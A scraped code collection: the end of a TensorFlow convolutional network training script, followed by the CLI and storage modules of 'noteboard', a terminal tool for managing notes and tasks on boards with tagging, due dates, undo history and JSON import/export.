'bd1': tf.Variable(tf.random_normal([1024])),
'out': tf.Variable(tf.random_normal([num_classes]))
}
# tf Graph input
X = tf.placeholder(tf.float32, [None, num_input])
Y = tf.placeholder(tf.float32, [None, num_classes])
keep_prob = tf.placeholder(tf.float32) # dropout (keep probability)
# Define Model
def conv_net(x, weights, biases, dropout):
# Reshaping inputs into proper shape
x = tf.reshape(x, shape=[-1, 14400, 1])
# First Convolutional Layer
    conv1 = conv1d(x, weights['wc1'], biases['bc1'], stride=1)  # conv1d already applies relu
conv1 = maxpool1d(conv1, k=5)
# Reshaping for 2D Convolutions
conv1_reshaped = tf.reshape(conv1, shape=[-1, 5, 576, 10])
# Second Convolutional Layer
    conv2 = conv2d(conv1_reshaped, weights['wc2'], biases['bc2'], strides=1)  # conv2d already applies relu
conv2 = tf.squeeze(conv2, axis=1)
conv2 = maxpool1d(conv2, k=5)
# Fully connected layer
# Reshape conv2 output to fit fully connected layer input
fc1 = tf.reshape(conv2, [-1, weights['wd1'].get_shape().as_list()[0]])
fc1 = tf.add(tf.matmul(fc1, weights['wd1']), biases['bd1'])
fc1 = tf.nn.relu(fc1)
# Apply Dropout
fc1 = tf.nn.dropout(fc1, dropout)
# Output, class prediction
out = tf.add(tf.matmul(fc1, weights['out']), biases['out'])
return out
# Construct model
logits = conv_net(X, weights, biases, keep_prob)
prediction = tf.nn.softmax(logits)
# Define loss and optimizer
loss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
logits=logits, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(loss_op)
# Evaluate model
correct_pred = tf.equal(tf.argmax(prediction, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
# Initialize the variables (i.e. assign their default value)
init = tf.global_variables_initializer()
# Start training
with tf.Session() as sess:
# Run the initializer
sess.run(init)
    indices = np.arange(X_train.size)  # include index 0 so every training example can be sampled
for epoch in range(epochs+1):
indices = shuffle(indices)
epoch_loss = 0
i = 0
while i < (len(X_train) - batch_size):
batch = np.random.choice(indices, size=batch_size)
batch_x = process_input(np.take(X_train, batch))
batch_y = np.take(y_train, batch, axis=0)
sess.run(train_op, feed_dict={X: batch_x, Y: batch_y, keep_prob: 0.8})
loss, acc = sess.run([loss_op, accuracy], feed_dict={X: batch_x, Y: batch_y, keep_prob: 1.0})
print("Minibatch Loss= " + \
"{:.4f}".format(loss) + ", Training Accuracy= " + \
"{:.3f}".format(acc))
i += batch_size
print(str(i) + " Samples Processed")
print("Epoch " + str(epoch+1) + " Completed")
print("Testing Accuracy:", sess.run(accuracy, feed_dict={X: process_input(X_test),
Y: y_test,
keep_prob: 1.0}))
```
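The reshapes in `conv_net` only line up because of the pooling arithmetic; a sketch of the shape bookkeeping (batch dimension omitted, derived from the parameters above):
```python
import math

# 14400x1 -> conv1d SAME -> 14400x10 -> maxpool k=5 -> 2880x10
# -> reshape to 5x576x10 -> 5x5 conv2d VALID -> 1x572x20
# -> squeeze + maxpool k=5 -> 115x20 -> flatten -> 2300
assert 14400 // 5 == 2880 and 2880 * 10 == 5 * 576 * 10
assert 576 - 5 + 1 == 572
assert math.ceil(572 / 5) * 20 == 2300  # matches weights['wd1'] input size
```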
{
"source": "a1phat0ny/noteboard",
"score": 3
}
#### File: noteboard/noteboard/cli.py
```python
import argparse
import sys
import os
import re
import shlex
import logging
from colorama import init, deinit, Fore, Back, Style
from . import DEFAULT_BOARD, TAGS
from .__version__ import __version__
from .storage import Storage, History, NoteboardException
from .utils import time_diff, add_date, to_timestamp, to_datetime
logger = logging.getLogger("noteboard")
COLORS = {
"add": "GREEN",
"remove": "LIGHTMAGENTA_EX",
"clear": "RED",
"run": "BLUE",
"tick": "GREEN",
"mark": "YELLOW",
"star": "YELLOW",
"tag": "LIGHTBLUE_EX",
"untick": "GREEN",
"unmark": "YELLOW",
"unstar": "YELLOW",
"untag": "LIGHTBLUE_EX",
"due": "LIGHTBLUE_EX",
"edit": "LIGHTCYAN_EX",
"move": "LIGHTCYAN_EX",
"rename": "LIGHTCYAN_EX",
"undo": "LIGHTCYAN_EX",
"import": "",
"export": "",
}
def p(*args, **kwargs):
print(" ", *args, **kwargs)
def error_print(text):
print(Style.BRIGHT + Fore.LIGHTRED_EX + "✘ " + text)
def get_fore_color(action):
    color = COLORS.get(action, "")
    if color == "":
        return ""
    return getattr(Fore, color)
def get_back_color(action):
    color = COLORS.get(action, "")
    if color == "":
        return Back.LIGHTWHITE_EX
    return getattr(Back, color)
def print_footer():
with Storage() as s:
shelf = dict(s.shelf)
ticks = 0
marks = 0
stars = 0
for board in shelf:
for item in shelf[board]:
if item["tick"] is True:
ticks += 1
if item["mark"] is True:
marks += 1
if item["star"] is True:
stars += 1
p(Fore.GREEN + str(ticks), Fore.LIGHTBLACK_EX + "done •", Fore.LIGHTRED_EX + str(marks), Fore.LIGHTBLACK_EX + "marked •", Fore.LIGHTYELLOW_EX + str(stars), Fore.LIGHTBLACK_EX + "starred")
def print_total():
with Storage() as s:
total = s.total
p(Fore.LIGHTCYAN_EX + "Total Items:", Style.DIM + str(total))
def run(args):
color = get_fore_color("run")
item = args.item
with Storage() as s:
i = s.get_item(item)
# Run
import subprocess
cmd = shlex.split(i["text"])
if "|" in cmd:
command = i["text"]
shell = True
elif len(cmd) == 1:
command = i["text"]
shell = True
else:
command = cmd
shell = False
        executable = os.environ.get("SHELL", None)
        process = subprocess.Popen(command, shell=shell, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, stdin=subprocess.PIPE, executable=executable)
# Live stdout output
deinit()
print(color + "[>] Running item" + Fore.RESET, Style.BRIGHT + str(i["id"]) + Style.RESET_ALL, color + "as command...\n" + Fore.RESET)
for line in iter(process.stdout.readline, b""):
sys.stdout.write(line.decode("utf-8"))
process.wait()
def add(args):
color = get_fore_color("add")
items = args.item
board = args.board
with Storage() as s:
print()
for item in items:
if not item:
error_print("Text must not be empty")
return
s.save_history()
i = s.add_item(board, item)
p(color + "[+] Added item", Style.BRIGHT + str(i["id"]), color + "to", Style.BRIGHT + (board or DEFAULT_BOARD))
s.write_history("add", "added item {} [{}] to board [{}]".format(str(i["id"]), item, (board or DEFAULT_BOARD)))
print_total()
print()
def remove(args):
color = get_fore_color("remove")
items = args.item
with Storage() as s:
print()
for item in items:
s.save_history()
i, board = s.remove_item(item)
p(color + "[-] Removed item", Style.BRIGHT + str(i["id"]), color + "on", Style.BRIGHT + board)
s.write_history("remove", "removed item {} [{}] from board [{}]".format(str(i["id"]), item, (board or DEFAULT_BOARD)))
print_total()
print()
def clear(args):
color = get_fore_color("clear")
boards = args.board
with Storage() as s:
print()
if boards:
for board in boards:
s.save_history()
amt = s.clear_board(board)
p(color + "[x] Cleared", Style.DIM + str(amt) + Style.RESET_ALL, color + "items on", Style.BRIGHT + board)
s.write_history("clear", "cleared {} items on board [{}]".format(str(amt), board))
else:
s.save_history()
amt = s.clear_board(None)
p(color + "[x] Cleared", Style.DIM + str(amt) + Style.RESET_ALL, color + "items on all boards")
s.write_history("clear", "cleared {} items on all board".format(str(amt)))
print_total()
print()
def tick(args):
color = get_fore_color("tick")
items = args.item
with Storage() as s:
print()
for item in items:
state = not s.get_item(item)["tick"]
s.save_history()
i = s.modify_item(item, "tick", state)
if state is True:
p(color + "[✓] Ticked item", Style.BRIGHT + str(i["id"]), color)
s.write_history("tick", "ticked item {} [{}]".format(str(i["id"]), i["text"]))
else:
p(color + "[✓] Unticked item", Style.BRIGHT + str(i["id"]), color)
s.write_history("untick", "unticked item {} [{}]".format(str(i["id"]), i["text"]))
print()
def mark(args):
color = get_fore_color("mark")
items = args.item
with Storage() as s:
print()
for item in items:
state = not s.get_item(item)["mark"]
s.save_history()
i = s.modify_item(item, "mark", state)
if state is True:
p(color + "[!] Marked item", Style.BRIGHT + str(i["id"]))
s.write_history("mark", "marked item {} [{}]".format(str(i["id"]), i["text"]))
else:
p(color + "[!] Unmarked item", Style.BRIGHT + str(i["id"]))
s.write_history("unmark", "unmarked item {} [{}]".format(str(i["id"]), i["text"]))
print()
def star(args):
color = get_fore_color("star")
items = args.item
with Storage() as s:
print()
for item in items:
state = not s.get_item(item)["star"]
s.save_history()
i = s.modify_item(item, "star", state)
if state is True:
p(color + "[*] Starred item", Style.BRIGHT + str(i["id"]))
s.write_history("star", "starred item {} [{}]".format(str(i["id"]), i["text"]))
else:
p(color + "[*] Unstarred item", Style.BRIGHT + str(i["id"]))
s.write_history("unstar", "unstarred item {} [{}]".format(str(i["id"]), i["text"]))
print()
def edit(args):
color = get_fore_color("edit")
item = args.item
text = (args.text or "").strip()
if text == "":
error_print("Text must not be empty")
return
with Storage() as s:
s.save_history()
i = s.modify_item(item, "text", text)
s.write_history("edit", "editted item {} from [{}] to [{}]".format(str(i["id"]), i["text"], text))
print()
p(color + "[~] Edited text of item", Style.BRIGHT + str(i["id"]), color + "from", i["text"], color + "to", text)
print()
def tag(args):
color = get_fore_color("tag")
items = args.item
text = (args.text or "").strip()
if len(text) > 10:
error_print("Tag text length should not be longer than 10 characters")
return
if text != "":
        c = TAGS.get(text, "") or TAGS["default"]
        tag_color = getattr(Fore, c.upper())
tag_text = text.replace(" ", "-")
else:
tag_text = ""
with Storage() as s:
print()
for item in items:
s.save_history()
i = s.modify_item(item, "tag", tag_text)
if text != "":
p(color + "[#] Tagged item", Style.BRIGHT + str(i["id"]), color + "with", tag_color + tag_text)
s.write_history("tag", "tagged item {} [{}] with tag text [{}]".format(str(i["id"]), i["text"], text))
else:
p(color + "[#] Untagged item", Style.BRIGHT + str(i["id"]))
s.write_history("tag", "untagged item {} [{}]".format(str(i["id"]), i["text"]))
print()
def due(args):
color = get_fore_color("due")
items = args.item
date = args.date or ""
    if date and not re.match(r"\d+[dw]", date):
        error_print("Invalid date pattern format")
        return
    match = re.findall(r"\d+[dw]", date)
if date:
days = 0
for m in match:
if m[-1] == "d":
days += int(m[:-1])
elif m[-1] == "w":
days += int(m[:-1]) * 7
duedate = add_date(days)
ts = to_timestamp(duedate)
else:
ts = None
with Storage() as s:
print()
for item in items:
s.save_history()
i = s.modify_item(item, "due", ts)
if ts:
p(color + "[:] Assigned due date", duedate, color + "to", Style.BRIGHT + str(item))
s.write_history("due", "assiged due date [{}] to item {} [{}]".format(duedate, str(i["id"]), i["text"]))
else:
p(color + "[:] Unassigned due date of item", Style.BRIGHT + str(item))
s.write_history("due", "unassiged due date of item {} [{}]".format(str(i["id"]), i["text"]))
print()
def move(args):
color = get_fore_color("move")
items = args.item
board = args.board
with Storage() as s:
print()
for item in items:
s.save_history()
i, b = s.move_item(item, board)
p(color + "[&] Moved item", Style.BRIGHT + str(i["id"]), color + "to", Style.BRIGHT + board)
s.write_history("move", "moved item {} [{}] from board [{}] to [{}]".format(str(i["id"]), i["text"], b, board))
print()
def rename(args):
color = get_fore_color("rename")
board = args.board
new = (args.new or "").strip()
if new == "":
error_print("Board name must not be empty")
return
with Storage() as s:
print()
        s.get_board(board)  # raises BoardNotFoundError if the board does not exist
s.save_history()
s.shelf[new] = s.shelf.pop(board)
p(color + "[~] Renamed", Style.BRIGHT + board, color + "to", Style.BRIGHT + new)
s.write_history("rename", "renamed board [{}] to [{}]".format(board, new))
print()
def undo(_):
color = get_fore_color("undo")
with Storage() as s:
all_hist = s.history.load()
hist = [i for i in all_hist if i["data"] is not None]
if len(hist) == 0:
error_print("Already at oldest change")
return
state = hist[-1]
print()
p(color + Style.BRIGHT + "Last Action:")
p("=>", get_fore_color(state["action"]) + state["info"])
print()
ask = input("[?] Continue (y/n) ? ")
if ask != "y":
error_print("Operation aborted")
return
s.history.revert()
print(color + "[^] Undone", "=>", get_fore_color(state["action"]) + state["info"])
def import_(args):
color = get_fore_color("import")
path = args.path
with Storage() as s:
s.save_history()
full_path = s.import_(path)
s.write_history("import", "imported boards from [{}]".format(full_path))
print()
p(color + "[I] Imported boards from", Style.BRIGHT + full_path)
print_total()
print()
def export(args):
color = get_fore_color("export")
dest = args.dest
path = os.path.abspath(os.path.expanduser(dest))
if os.path.isfile(path):
print("[i] File {} already exists".format(path))
ask = input("[?] Overwrite (y/n) ? ")
if ask != "y":
error_print("Operation aborted")
return
with Storage() as s:
full_path = s.export(path)
s.write_history("export", "exported boards to [{}]".format(full_path))
print()
p(color + "[E] Exported boards to", Style.BRIGHT + full_path)
print()
def history(_):
hist = History.load()
for action in hist:
name = action["action"]
info = action["info"]
date = action["date"]
print(Fore.LIGHTYELLOW_EX + date, get_back_color(name) + Fore.BLACK + name.upper().center(9), info)
def display_board(shelf, date=False, timeline=False):
# print initial help message
if not shelf:
print()
c = "`board --help`"
p(Style.BRIGHT + "Type", Style.BRIGHT + Fore.YELLOW + c, Style.BRIGHT + "to get started")
for board in shelf:
# Print Board title
if len(shelf[board]) == 0:
continue
print()
p("\033[4m" + Style.BRIGHT + board, Fore.LIGHTBLACK_EX + "[{}]".format(len(shelf[board])))
# Print Item
for item in shelf[board]:
mark = Fore.BLUE + "●"
text_color = ""
tag_text = ""
# tick
if item["tick"] is True:
mark = Fore.GREEN + "✔"
text_color = Fore.LIGHTBLACK_EX
# mark
if item["mark"] is True:
if item["tick"] is False:
mark = Fore.LIGHTRED_EX + "!"
text_color = Style.BRIGHT + Fore.RED
# tag
if item["tag"]:
                c = TAGS.get(item["tag"], "") or TAGS["default"]
                tag_color = getattr(Fore, c.upper())
tag_text = " " + tag_color + "(" + item["tag"] + ")"
# Star
star = " "
if item["star"] is True:
star = Fore.LIGHTYELLOW_EX + "⭑"
# Day difference
days = time_diff(item["time"]).days
if days <= 0:
day_text = ""
else:
day_text = Fore.LIGHTBLACK_EX + "{}d".format(days)
# Due date
due_text = ""
color = ""
if item["due"]:
due_days = time_diff(item["due"], reverse=True).days + 1 # + 1 because today is included
if due_days == 0:
text = "today"
color = Fore.RED
elif due_days == 1:
text = "tomorrow"
color = Fore.YELLOW
elif due_days == -1:
text = "yesterday"
color = Fore.BLUE
elif due_days < 0:
text = "{}d ago".format(due_days*-1)
elif due_days > 0:
text = "{}d".format(due_days)
due_text = "{}(due: {}{})".format(Fore.LIGHTBLACK_EX, color + text, Style.RESET_ALL + Fore.LIGHTBLACK_EX)
# print text all together
if date is True and timeline is False:
p(star, Fore.LIGHTMAGENTA_EX + str(item["id"]).rjust(2), mark, text_color + item["text"], tag_text, Fore.LIGHTBLACK_EX + str(item["date"]),
(Fore.LIGHTBLACK_EX + "(due: {})".format(color + str(to_datetime(item["due"])) + Fore.LIGHTBLACK_EX)) if item["due"] else "")
else:
p(star, Fore.LIGHTMAGENTA_EX + str(item["id"]).rjust(2), mark, text_color + item["text"] + (Style.RESET_ALL + Fore.LIGHTBLUE_EX + " @" + item["board"] if timeline else ""),
tag_text, day_text, due_text)
print()
print_footer()
print_total()
print()
def main():
description = (Style.BRIGHT + " \033[4mNoteboard" + Style.RESET_ALL + " lets you manage your " + Fore.YELLOW + "notes" + Fore.RESET + " & " + Fore.CYAN + "tasks" + Fore.RESET
+ " in a " + Fore.LIGHTMAGENTA_EX + "tidy" + Fore.RESET + " and " + Fore.LIGHTMAGENTA_EX + "fancy" + Fore.RESET + " way.")
epilog = \
"""
Examples:
$ board add "improve cli" -b "Todo List"
$ board remove 2 4
$ board clear "Todo List" "Coding"
$ board edit 1 "improve cli"
$ board tag 1 6 -t "enhancement" -c GREEN
$ board tick 1 5 9
$ board move 2 3 -b "Destination"
$ board import ~/Documents/board.json
$ board export ~/Documents/save.json
{0}Made with {1}\u2764{2} by a1phat0ny{3} (https://github.com/a1phat0ny/noteboard)
""".format(Style.BRIGHT, Fore.RED, Fore.RESET, Style.RESET_ALL)
parser = argparse.ArgumentParser(
prog="board",
description=description,
epilog=epilog,
formatter_class=argparse.RawTextHelpFormatter
)
parser._positionals.title = "Actions"
parser._optionals.title = "Options"
parser.add_argument("--version", action="version", version="noteboard " + __version__)
parser.add_argument("-d", "--date", help="show boards with the added date of every item", default=False, action="store_true", dest="d")
parser.add_argument("-s", "--sort", help="show boards with items on each board sorted alphabetically", default=False, action="store_true", dest="s")
parser.add_argument("-t", "--timeline", help="show boards in timeline view, ignore the -d/--date option", default=False, action="store_true", dest="t")
subparsers = parser.add_subparsers()
add_parser = subparsers.add_parser("add", help=get_fore_color("add") + "[+] Add an item to a board" + Fore.RESET)
add_parser.add_argument("item", help="the item you want to add", type=str, metavar="<item text>", nargs="+")
add_parser.add_argument("-b", "--board", help="the board you want to add the item to (default: {})".format(DEFAULT_BOARD), type=str, metavar="<name>")
add_parser.set_defaults(func=add)
remove_parser = subparsers.add_parser("remove", help=get_fore_color("remove") + "[-] Remove items" + Fore.RESET)
remove_parser.add_argument("item", help="id of the item you want to remove", type=int, metavar="<item id>", nargs="+")
remove_parser.set_defaults(func=remove)
clear_parser = subparsers.add_parser("clear", help=get_fore_color("clear") + "[x] Clear all items on a/all board(s)" + Fore.RESET)
clear_parser.add_argument("board", help="clear this specific board", type=str, metavar="<name>", nargs="*")
clear_parser.set_defaults(func=clear)
tick_parser = subparsers.add_parser("tick", help=get_fore_color("tick") + "[✓] Tick/Untick an item" + Fore.RESET)
tick_parser.add_argument("item", help="id of the item you want to tick/untick", type=int, metavar="<item id>", nargs="+")
tick_parser.set_defaults(func=tick)
mark_parser = subparsers.add_parser("mark", help=get_fore_color("mark") + "[!] Mark/Unmark an item" + Fore.RESET)
mark_parser.add_argument("item", help="id of the item you want to mark/unmark", type=int, metavar="<item id>", nargs="+")
mark_parser.set_defaults(func=mark)
star_parser = subparsers.add_parser("star", help=get_fore_color("star") + "[*] Star/Unstar an item" + Fore.RESET)
star_parser.add_argument("item", help="id of the item you want to star/unstar", type=int, metavar="<item id>", nargs="+")
star_parser.set_defaults(func=star)
edit_parser = subparsers.add_parser("edit", help=get_fore_color("edit") + "[~] Edit the text of an item" + Fore.RESET)
edit_parser.add_argument("item", help="id of the item you want to edit", type=int, metavar="<item id>")
edit_parser.add_argument("text", help="new text to replace the old one", type=str, metavar="<new text>")
edit_parser.set_defaults(func=edit)
tag_parser = subparsers.add_parser("tag", help=get_fore_color("tag") + "[#] Tag an item with text" + Fore.RESET)
tag_parser.add_argument("item", help="id of the item you want to tag", type=int, metavar="<item id>", nargs="+")
tag_parser.add_argument("-t", "--text", help="text of tag (do not specify this argument to untag)", type=str, metavar="<tag text>")
tag_parser.set_defaults(func=tag)
due_parser = subparsers.add_parser("due", help=get_fore_color("due") + "[:] Assign a due date to an item" + Fore.RESET)
due_parser.add_argument("item", help="id of the item", type=int, metavar="<item id>", nargs="+")
due_parser.add_argument("-d", "--date", help="due date of the item in the format of `<digit><d|w>` e.g. '1w4d' for 1 week and 4 days (11 days)", type=str, metavar="<due date>")
due_parser.set_defaults(func=due)
run_parser = subparsers.add_parser("run", help=get_fore_color("run") + "[>] Run an item as command" + Fore.RESET)
run_parser.add_argument("item", help="id of the item you want to run", type=int, metavar="<item id>")
run_parser.set_defaults(func=run)
move_parser = subparsers.add_parser("move", help=get_fore_color("move") + "[&] Move an item to another board" + Fore.RESET)
move_parser.add_argument("item", help="id of the item you want to move", type=int, metavar="<item id>", nargs="+")
move_parser.add_argument("-b", "--board", help="name of the destination board", type=str, metavar="<name>", required=True)
move_parser.set_defaults(func=move)
rename_parser = subparsers.add_parser("rename", help=get_fore_color("rename") + "[~] Rename the name of the board" + Fore.RESET)
rename_parser.add_argument("board", help="name of the board you want to rename", type=str, metavar="<name>")
rename_parser.add_argument("new", help="new name to replace the old one", type=str, metavar="<new name>")
rename_parser.set_defaults(func=rename)
undo_parser = subparsers.add_parser("undo", help=get_fore_color("undo") + "[^] Undo the last action" + Fore.RESET)
undo_parser.set_defaults(func=undo)
import_parser = subparsers.add_parser("import", help=get_fore_color("import") + "[I] Import and load boards from JSON file" + Fore.RESET)
import_parser.add_argument("path", help="path to the target import file", type=str, metavar="<path>")
import_parser.set_defaults(func=import_)
export_parser = subparsers.add_parser("export", help=get_fore_color("export") + "[E] Export boards as a JSON file" + Fore.RESET)
export_parser.add_argument("-d", "--dest", help="destination of the exported file (default: ./board.json)", type=str, default="./board.json", metavar="<destination path>")
export_parser.set_defaults(func=export)
history_parser = subparsers.add_parser("history", help="[.] Prints out the historical changes")
history_parser.set_defaults(func=history)
args = parser.parse_args()
init(autoreset=True)
try:
args.func
except AttributeError:
with Storage() as s:
shelf = dict(s.shelf)
if args.s:
# sort alphabetically
for board in shelf:
shelf[board] = sorted(shelf[board], key=lambda x: x["text"].lower())
elif args.d:
# sort by date
for board in shelf:
shelf[board] = sorted(shelf[board], key=lambda x: x["time"], reverse=True)
if args.t:
data = {}
for board in shelf:
for item in shelf[board]:
if item["date"]:
if item["date"] not in data:
data[item["date"]] = []
item.update({"board": board})
data[item["date"]].append(item)
shelf = data
display_board(shelf, date=args.d, timeline=args.t)
else:
try:
args.func(args)
except KeyboardInterrupt:
error_print("Operation aborted")
except NoteboardException as e:
error_print(str(e))
logger.debug("(ERROR)", exc_info=True)
except Exception as e:
error_print(str(e))
logger.debug("(ERROR)", exc_info=True)
deinit()
```
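A standalone recap (illustrative) of how the `due` handler turns `<n>d`/`<n>w` tokens into a day count:
```python
import re

date = '1w4d'
days = sum(int(m[:-1]) * (7 if m[-1] == 'w' else 1)
           for m in re.findall(r'\d+[dw]', date))
print(days)  # 11 days: 1 week + 4 days
```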
#### File: noteboard/noteboard/storage.py
```python
import shelve
import gzip
import shutil
import json
import os
import logging
from . import DIR_PATH, HISTORY_PATH, STORAGE_PATH, STORAGE_GZ_PATH, DEFAULT_BOARD
from .utils import get_time, to_datetime
logger = logging.getLogger("noteboard")
class NoteboardException(Exception):
"""Base Exception Class of Noteboard."""
class ItemNotFoundError(NoteboardException):
"""Raised when no item with the specified id found."""
def __init__(self, id):
self.id = id
def __str__(self):
return "Item {} not found".format(self.id)
class BoardNotFoundError(NoteboardException):
"""Raised when no board with specified name found."""
def __init__(self, name):
self.name = name
def __str__(self):
return "Board '{}' not found".format(self.name)
class History:
def __init__(self, storage):
self.storage = storage
self.buffer = None
@staticmethod
def load():
try:
with gzip.open(HISTORY_PATH, "r") as j:
history = json.loads(j.read().decode("utf-8"))
except FileNotFoundError:
raise NoteboardException("History file not found for loading")
return history
def revert(self):
history = History.load()
hist = [i for i in history if i["data"] is not None]
if len(hist) == 0:
return {}
state = hist[-1]
logger.debug("Revert state: {}".format(state))
# Update the shelf
self.storage.shelf.clear()
self.storage.shelf.update(dict(state["data"]))
# Remove state from history
history.remove(state)
# Update the history file
with gzip.open(HISTORY_PATH, "w") as j:
j.write(json.dumps(history).encode("utf-8"))
return state
def save(self, data):
self.buffer = data.copy()
def write(self, action, info):
is_new = not os.path.isfile(HISTORY_PATH)
# Create and initialise history file with an empty list
if is_new:
with gzip.open(HISTORY_PATH, "w+") as j:
j.write(json.dumps([]).encode("utf-8"))
# Write data to disk
# => read the current saved states
history = History.load()
# => dump history data
state = {"action": action, "info": info, "date": get_time("%d %b %Y %X")[0], "data": dict(self.buffer) if self.buffer else self.buffer}
logger.debug("Write history: {}".format(state))
history.append(state)
with gzip.open(HISTORY_PATH, "w") as j:
j.write(json.dumps(history).encode("utf-8"))
self.buffer = None # empty the buffer
class Storage:
def __init__(self):
self._shelf = None
self.history = History(self)
def __enter__(self):
self.open()
return self
def __exit__(self, *args, **kwargs):
self.close()
return False
def open(self):
# Open shelf
if self._shelf is not None:
raise NoteboardException("Shelf object has already been opened.")
if not os.path.isdir(DIR_PATH):
logger.debug("Making directory {} ...".format(DIR_PATH))
os.mkdir(DIR_PATH)
if os.path.isfile(STORAGE_GZ_PATH):
# decompress compressed storage.gz to a storage file
with gzip.open(STORAGE_GZ_PATH, "rb") as f_in:
with open(STORAGE_PATH, "wb") as f_out:
shutil.copyfileobj(f_in, f_out)
os.remove(STORAGE_GZ_PATH)
self._shelf = shelve.open(STORAGE_PATH, "c", writeback=True)
def close(self):
if self._shelf is None:
raise NoteboardException("No opened shelf object to be closed.")
# Cleanup
for board in self.shelf:
# remove empty boards
if not self.shelf[board]:
self.shelf.pop(board)
continue
# always sort items on the boards before closing
self.shelf[board] = list(sorted(self.shelf[board], key=lambda x: x["id"]))
self._shelf.close()
# compress storage to storage.gz
with gzip.open(STORAGE_GZ_PATH, "wb") as f_out:
with open(STORAGE_PATH, "rb") as f_in:
shutil.copyfileobj(f_in, f_out)
os.remove(STORAGE_PATH)
@property
def shelf(self):
"""Use this property to access the shelf object from the outside."""
if self._shelf is None:
raise NoteboardException("No opened shelf object to be accessed.")
return self._shelf
@property
def boards(self):
"""Get all existing board titles."""
return list(self.shelf.keys())
@property
def items(self):
"""Get all existing items with ids and texts."""
results = {}
for board in self.shelf:
for item in self.shelf[board]:
results[item["id"]] = item["text"]
return results
@property
def total(self):
"""Get the total amount of items in all boards."""
return len(self.items)
def get_item(self, id):
"""Get the item with the give ID. ItemNotFoundError will be raised if nothing found."""
for board in self.shelf:
for item in self.shelf[board]:
if item["id"] == id:
return item
raise ItemNotFoundError(id)
def get_board(self, name):
"""Get the board with the given name. BoardNotFound will be raised if nothing found."""
for board in self.shelf:
if board == name:
return self.shelf[name]
raise BoardNotFoundError(name)
def get_all_items(self):
items = []
for board in self.shelf:
for item in self.shelf[board]:
items.append(item)
return items
def _add_board(self, board):
if board.strip() == "":
raise ValueError("Board title must not be empty.")
if board in self.shelf.keys():
raise KeyError("Board already exists.")
logger.debug("Added Board: '{}'".format(board))
self.shelf[board] = [] # register board by adding an empty list
def _add_item(self, id, board, text):
date, timestamp = get_time()
payload = {
"id": id, # int
"text": text, # str
"time": timestamp, # int
"date": date, # str
"due": None, # int
"tick": False, # bool
"mark": False, # bool
"star": False, # bool
"tag": "" # str
}
self.shelf[board].append(payload)
logger.debug("Added Item: {} to Board: '{}'".format(json.dumps(payload), board))
return payload
def add_item(self, board, text):
"""[Action]
* Can be Undone: Yes
        Prepare data to be dumped into the shelf.
        If the specified board is not found, a new board is automatically created and initialised.
        This method passes the prepared dictionary to self._add_item, which actually appends it to the board.
Returns:
dict -- data of the added item
"""
current_id = 1
# get all existing ids
ids = list(sorted(self.items.keys()))
if ids:
current_id = ids[-1] + 1
# board name
board = board or DEFAULT_BOARD
# add
if board not in self.shelf:
# create board
self._add_board(board)
# add item
return self._add_item(current_id, board, text)
def remove_item(self, id):
"""[Action]
* Can be Undone: Yes
Remove an existing item from board.
Returns:
dict -- data of the removed item
str -- board name of the regarding board of the removed item
"""
status = False
for board in self.shelf:
for item in self.shelf[board]:
if item["id"] == id:
# remove
self.shelf[board].remove(item)
removed = item
board_of_removed = board
logger.debug("Removed Item: {} on Board: '{}'".format(json.dumps(item), board))
status = True
if len(self.shelf[board]) == 0:
del self.shelf[board]
if status is False:
raise ItemNotFoundError(id)
return removed, board_of_removed
def clear_board(self, board=None):
"""[Action]
* Can be Undone: Yes
Remove all items of a board or of all boards (if no board is specified).
Returns:
int -- total amount of items removed
"""
if not board:
amt = len(self.items)
# remove all items of all boards
self.shelf.clear()
logger.debug("Cleared all {} Items".format(amt))
else:
# remove
if board not in self.shelf:
raise BoardNotFoundError(board)
amt = len(self.shelf[board])
del self.shelf[board]
logger.debug("Cleared {} Items on Board: '{}'".format(amt, board))
return amt
def modify_item(self, id, key, value):
"""[Action]
* Can be Undone: Partially (only when modifying text)
Modify the data of an item, given its ID.
If the item does not have the key, one will be created.
Arguments:
id {int} -- id of the item you want to modify
key {str} -- one of [id, text, time, tick, star, mark, tag]
value -- new value to replace the old value
Returns:
dict -- the item before modification
"""
item = self.get_item(id)
old = item.copy()
item[key] = value
logger.debug("Modified Item from {} to {}".format(json.dumps(old), json.dumps(item)))
return old
def move_item(self, id, board):
"""[Action]
* Can be Undone: No
Move the whole item to the destination board, given the id of the item and the name of the board.
If the destination board does not exist, one will be created.
Arguments:
id {int} -- id of the item you want to move
board {str} -- name of the destination board
Returns:
item {dict} -- the item that is moved
b {str} -- the name of the board the item originally came from
"""
for b in self.shelf:
for item in self.shelf[b]:
if item["id"] == id:
if not self.shelf.get(board):
# register board with an empty list if board not found
self.shelf[board] = []
# append to dest board `board`
self.shelf[board].append(item)
# remove from the current board `b`
self.shelf[b].remove(item)
return item, b
raise ItemNotFoundError(id)
@staticmethod
def _validate_json(data):
keys = ["id", "text", "time", "date", "due", "tick", "mark", "star", "tag"]
for board in data:
if board.strip() == "":
return False
# Check for board type (list)
if not isinstance(data[board], list):
return False
for item in data[board]:
# Check for item type (dictionary)
if not isinstance(item, dict):
return False
# Check for existence of keys
for key in keys:
if key not in item.keys():
return False
# Automatically make one from supplied timestamp if date is not supplied
if not item["date"] and item["time"]:
item["date"] = to_datetime(float(item["time"])).strftime("%a %d %b %Y")
return True
def import_(self, path):
"""[Action]
* Can be Undone: Yes
Import and load a local file (json) and overwrite the current boards.
Arguments:
path {str} -- path to the archive file
Returns:
path {str} -- full path of the imported file
"""
path = os.path.abspath(path)
try:
with open(path, "r") as f:
data = json.load(f)
except FileNotFoundError:
raise NoteboardException("File not found ({})".format(path))
except json.JSONDecodeError:
raise NoteboardException("Failed to decode JSON")
else:
if self._validate_json(data) is False:
raise NoteboardException("Invalid JSON structure for noteboard")
# Overwrite the current shelf and update it
self.shelf.clear()
self.shelf.update(dict(data))
return path
def export(self, dest="./board.json"):
"""[Action]
* Can be Undone: No
Export the current shelf as a JSON file to `dest`.
Arguments:
dest {str} -- path of the destination
Returns:
path {str} -- full path of the exported file
"""
dest = os.path.abspath(dest)
data = dict(self.shelf)
with open(dest, "w") as f:
json.dump(data, f, indent=4, sort_keys=True)
return dest
def save_history(self):
data = {}
for board in self.shelf:
data[board] = []
for item in self.shelf[board]:
data[board].append(item.copy())
self.history.save(data)
def write_history(self, action, info):
self.history.write(action, info)
```
